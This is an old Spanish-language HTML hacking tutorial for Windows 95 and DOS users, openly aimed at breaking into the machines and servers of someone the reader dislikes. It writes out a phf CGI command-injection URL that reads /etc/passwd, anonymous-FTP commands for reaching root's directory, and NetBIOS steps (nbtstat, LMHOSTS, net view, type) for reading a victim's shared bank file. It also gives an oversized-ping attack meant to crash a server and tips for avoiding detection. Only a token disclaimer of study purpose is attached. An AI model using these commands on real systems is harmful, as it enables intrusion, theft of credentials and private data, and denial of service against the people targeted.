<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="GENERATOR" content="Mozilla/4.5 [es] (Win98; I) [Netscape]">
   <title>PIRATEO a GOG&Oacute; </title>
</head>
<body text="#FFFFFF" bgcolor="#000000">

<center><b><u><font color="#FF0000"><font size=+2>PIRATEO PARA TODOS</font></font></u></b></center>

<p><font face="Tahoma"><font size=-1>Ya se que todos vosotros pensais que
este es una articulo de los tantos que hay perdidos en la red,que hacen
repetir una y otra vez lo mismo,... y ahora seguro que pensareis que este
es una articulo de esos que dice que es diferente y son lo mismo de siempre
(jejeje!) Pues esta vez no,aqu&iacute; te voy a decir algunos truquitos
que hacen tiempo que no se hacen y que te pueden ser MUUUYYY utiles.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Si navegais por la red buscando cosillas
de pirateo seguro que os habreis dado cuenta de dos cosas,o estan en ingles,o
en linux. Para ser un buen hacker estan: Los 10 mandamientos que puso Miguel
A. en el BZ2 (que tiene toda la raz&oacute;n del mundo) y saber UNIX o
LINUX.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Si t&uacute; sabes unix/linux no pasa
nada pero si no lo sabes...a que jode? Bueno,pues aqu&iacute; te voy a
comentar como hacer pirateo con los dos sistemas operativos mas conocidos
del mercado, el MS-DOS y el W95. &iquest;Porque? muy sencillo,si alg&uacute;n
haceis pirateo (como principiantes),no vais a piratear la web de microsoft,ni
de telefonica,porque os pillarian los webers a la velocidad de la luz.
Cuando empezaba mis tiempos de informatico (Ay! que tiempos!) no tenia
ni puta idea de lo que era UNIX,as&iacute; que tuve que averiguar como
hacer pirateo con el DOS y el W3.11,pero como los tiempos avanzan ahora
ya tenemos el W95,con mas posiblidades de crakeo (gracias bill!!) ;) Aparte
de que si quereis hacer pirateo,mola mas hacerlo en un ordenador de alg&uacute;n
capullo que conoces y te cae mal,pues como casi toda la gente tiene W95
o el DOS,podemos, gracias a estos dos S.O,entrar y explorar discos duros
(por ejemplo) y hacerle cosillas ;)</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>A que esto se anima? pues sigamos!...</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Como puedes ver el W95 no tiene ni
un pijo de seguridad,cuando te pide el password apretas la X y a la caca,y
lo mejor de todo &iexcl;&iexcl;esta hecho en java!! >;->.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Empecemos.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Sabes lo que es un FTP? bien,pues
en el windows95 lleva un cliente de ftp incorporado,la unica pega es que
se ejecuta en modo dos y no es muy vistoso. para activar el modo ftp tecleas:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\>ftp</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>despues te tiene que salir esto:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>ftp></font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>para informarte de este "modo" pide
ayuda pulsando el ? o help. Con esta pijotada de servidor podremos hacer
cosas muuuyyy interesantes,ya lo veremos mas adelante.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Pues visto esto vamos con la primera
tecnica,bastante antigua, no te puedo asegurar que a&uacute;n funcione,pero
seguro que en algun sitio lo puedes hacer. Esta tecnica consiste en ver
el ficheo de passwords mediante el "in" del navegador. Necesitas que tu
W95 tenga un navegador instalado,como todos vienen con el Iexplorer creo
que no habr&aacute; problemas. Esiste muchas formas de ponerla pero aqu&iacute;
va la que mas funciona (a veces): Escribe esto en el in del navegador:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>http://www.elcapullo.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Si teneis pirula os saldr&aacute;
el fichero de passwords del servidor,ahora lo copiais a vuestro dico duro
y salis a toda leche de internet (por si las moscas) ;),no es que te pase
algo,pero por si las moscas sal de ah&iacute;.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Si esto te ha funcionado,ya te has
ahorrado un paso con el unix. Bien,esto se hacia de forma "grafica" y sin
rompernos mucho el coco. Ahora vamos a hacer casi lo mismo pero con el
ftp del W95 que ya vimos antes,intentaremos acceder al fichero de passwords...
Esto el lo que haremos:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>ftp> open elcapullo.com</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp; Conect to elcapullo.com</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp; 220 elcapullo.com FTP server
ready.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>ftp> quote user ftp</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp; 331 Guest login ok, send ident
as password.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>ftp> quote cwd ~root</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp; 530 Please login with USER
and PASS.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>ftp> quote pass ftp</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp; 230 Guest login ok, access
restrictions apply.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>ftp> dir (o lo que os d&eacute; la
gana =};) )</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Ep!Ep! tranquilo,eso de open quote
etc.. lo encontrar&aacute;s en la ayuda del "comando",o si no teb empollas
un libro de ftp,te ser&aacute; muy util, jejeje... Si te sale algo raro
o no te sale lo que pongo y salen palabras raras,tu olvidate y pirate,no
te arriesques.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>A estas alturas te estaras preguntando
y como se hace eso de entrar en el disco duro de otro,lo dijiste al principio,mentiroso!!
-no,no,no soy ning&uacute;n mentiroso,ahora os lo muestro. Lo que pasa
es que tal vez este tema es un poco delicado as&iacute; que me pondr&eacute;
tecnico,como un director de banca o algo as&iacute;.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Como win95 NO tiene seguridad (lo
dije antes) nos permite colarnos en el disco duro de "elcapullo" por la
red y lo mejor de todo es que esta tecnica nos la proporciona los propios
programas del win95&ccedil;,jejeje... Por supuesto no todo es tan sencillo
ya que hay que cumplir unos requisitos minimos. Esto se debe a una mala
configuraci&oacute;n del propio "usuario" al no configurar adecuadamente
los recursos compartidos de su red "corriendo" sobre win95.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Para colarnos en el HD de otro ordenador
(lo llamaremos "elcapullo") debenos tener nuestro ordenador bien configurado,o
sea,el compartir recursos bien puesto y tambien tener el "Netbios" instalado.
Para configurarlo, tenemos que tener activado la opcion de "compartir ficheros
e impresoras" en MIPC->Panel de Control->Red.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>SI por el caso la opcion esta desactivada,simplemente
teneis que pulsar el boton de "a&ntilde;adir" y a&ntilde;adimos el servicio
"Compartir ficheros e impresoras en redes Microsoft". En la misma ventana,
debemos tener el "Primer inicio de sesion" en "Cliente para redes Microsoft"
(ya os dije que esto es un poco delicado,estoy siendo lo mas tecnico que
puedo para que lo entiendas). Tambien tiene que estar activado el "Cliente
para redes Microsoft", que viene por defecto en MIPC->Acceso Telefonico
a Redes->Conexion a Inet que usaremos->boton derecho-> propiedades (creo),
debiendo estar activada la casilla "conectarse a la red".</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Ahora ya podemos ponernos manos a
la obra,mejor dicho a la masa, entonces "volvemos" a una ventana del MS-DOS
y ejecutamos:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\>nbtstat -A (IP de la victima en
este caso elcapullo)</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\>nbtstat -A (IP de la victima en
este caso elcapullo)</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; NetBIOS Remote
Machine Name Table</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Status</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; ---------------------------------------------</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; elcapulloMACHINE&nbsp;&nbsp;&nbsp;
&lt;00>&nbsp;&nbsp;&nbsp; UNIQUE&nbsp;&nbsp;&nbsp;&nbsp; Registered</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; elcapulloGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&lt;00>&nbsp;&nbsp;&nbsp; GROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Registered</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; elcapulloMACHINE&nbsp;&nbsp;&nbsp;
&lt;03>&nbsp;&nbsp;&nbsp; UNIQUE&nbsp;&nbsp;&nbsp;&nbsp; Registered</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; elcapulloMACHINE&nbsp;&nbsp;&nbsp;
&lt;20>&nbsp;&nbsp;&nbsp; UNIQUE&nbsp;&nbsp;&nbsp;&nbsp; Registered</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; elcapulloGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&lt;1E>&nbsp;&nbsp;&nbsp; GROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Registered</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>&nbsp;&nbsp;&nbsp; MAC Address = 44-45-53-54-00-00</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Cuando ejecutamos este comando nos
saldra una tabla como esta (o parecida) y el primer "UNIQUE" de tipo &lt;00>
es el nombre de la victima y como puedes ver la maquina se llama elcapulloMACHINE.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Entonces ahora creamos/editamos el
archivo LMHOSTS, si por el caso encontrais uno que pone LMHOSTS.SAM no
lo toqueis,hacedme caso,que luego pasa lo que pasa, poniendo la direccion
IP y el nombre de la maquina en cuestion, esto seria de la siguiente forma:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\>edit c:\windows\system32\LMHOSTS</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>elcapulloMACHINE</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Entonces cerramos el fichero y desde
un ventana del MS-DOS ejecutamos un comando para a&ntilde;adir el ordenador
de elcapullo a nuestro Netbios y... como lo hariamos? bien sencillo,as&iacute;:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\>NBTSTAT -R</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Ahora nos interesa saber que recursos
comparte la elcapullo y esto tampoco nos dar&aacute; dolores de cabeza,as&iacute;
que dejad las aspirinas a un lado:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>&nbsp; c:\>net view \\elcapulloMAMACHINE</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>&nbsp;&nbsp; Shared resources at \\elcapulloMACHINE</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>&nbsp;&nbsp; Sharename&nbsp;&nbsp;&nbsp;
Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Comment</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp; -----------------------------------------</font></font>
<br><font face="Tahoma"><font size=-1>&nbsp;&nbsp; BANCO&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Disk</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>...y como podemos observar comparte
una carpeta llamada BANCO (mmmm!...Interesante). Ahora ya podemos hacer
como si fuese una terminal m&aacute;s en nuestra "red local" en win95.
Ya solo nos queda ejecutar el comando que querramos, si por ejemplo queremos
ver el contenido, solo tenemos que escribir:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\> dir \\elcapulloMACHINE\BANCO</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>...o para leer cualquier fichero de
la carpeta,o mejor dicho,del directorio:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\> type \\elcapulloMACHINE\BANCO\CUENTABANCARIA.TXT</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Si alguno de vosotros esta follao
con el windows95 y quiere un entorno grafico(o sea con una ventana y no
seguir usando el magnifico MS-DOS), solo tenemos que pulsar:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>INICIO->BUSCAR PC y dentremos el PC
remoto pero esto solo es posible si habeis a&ntilde;adido la elcapulloMACHINE
a una unidad de red a la que podamos llamar sino lo veo negro,debereis
ejecutar:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\>NET USE e: \\MIPC\WINDOWS</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Esta tecnica solo funciona si la "maquina
remota" ;) ejecuta win95 o win 3.11(de este ultimo no estoy muy seguro)
y ademas comparte las carpetas sin contrase&ntilde;a en modo "Acceso a
nivel compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en esa
maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
para que este autorizada, esto lo conseguiremos con el Regedit (thxxx),
por desgracia los S.S.O.O win95 y OSR2 que estan ejecutando el Servidor
Web Personal de Microsoft desactivan esta posibilidad de acceso remoto
tras informar de la conveniencia de hacerlo al usuario, ya que el servidor
web obliga a compartir carpetas aun sin tener red local.(no todo iba a
ser perfecto,no?)</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Logicamente un usuario que haya tenido
el despiste de conectarse a Internet con carpetas compartidas no toma luego
medidas de control sobre quien entra en su maquina. Pero no hay que hacer
ilusiones ya que podemos ser pillados si por ejemplo un usuario ejecuta
el programa Netwatch, que muestra los usuarios conectados a nuestra computadora
en cada momento y por supuesto el nombre de las computadoras por lo que
es aconsejable cambiar el nombre de nuestra computadora usando el Regedit.
Si nuestra maquina se llama HACKERMALO cambiamos todas la cadenas donde
aperezca este nombre con el Regedit a un nombre menos sospechoso porque
HACKERMALO no me inspira mucha confianza a mi,no crees?.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Si no conectamos la elcapulloMACHINE
como una unidad mas a nuestra computadora no nos tendremos que preocupar
del Netwatch (que a veces lode mucho), asi conseguiremos una "cierta" seguridad
personal ya que lo mas seguro, la elcapulloMACHINE no se dar&aacute; ni
cuenta de nuestra entrada. Tambien quiero decir que si la elcapulloMACHINE
quiere apagar su computadora le saldra el mensaje del tipo "hay otros usuarios
conectados a su ordenador, si apaga se desconectaran" cosa que significar&aacute;
que nos habr&aacute;n pillado y de lleno.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>BUF! me duele la boca de hablar tanto
tecnicismo,pero bueno,la pesadilla ya ha pasado.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Ahora explicar&eacute; como hacer
un ping en 4 lineas:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Seguro que ya sabreis que es un ping,pa&acute;los
que no los sabeis digamos que es una forma de joder un servidor mandadole
un sistema de paquetes,provocando un datagrama. Su sintaxis seria:</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>c:\> ping -l 65510 elcapullo.com</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Cuidado con esto,yo de vosotros no
lo haria,os pueden pillar facilmente,de todas formas podeis hacerlo en
una casa de internet y salir cagando leches,para que ni os reconozcan ni
nada parecido,eso s&iacute;,no entres en esa casa de internet nunca m&aacute;s,tal
vez est&eacute; exagerando,pero toda precauci&oacute;n es poca,si supierais
lo que me ha faltado para que me pillen usando el maldito ping este....</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Pues esto sa&acute;acabao,espero que
os haya gustao o sus haya servio de utilidad ;)</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Por supuesto,no me hago responsable
ni directa,ni indirectamente de la informaci&oacute;n aqu&iacute; contenida,solo
la expongo para su uso como estudio y como uso didactico.</font></font><font face="Tahoma"><font size=-1></font></font>
<p><font face="Tahoma"><font size=-1>Bu-Bueno,pues esto ha sido to-to-to-todo
amigos!</font></font>
<div align=right>
<p><img SRC="firma.jpg" height=53 width=160></div>

</body>
</html>
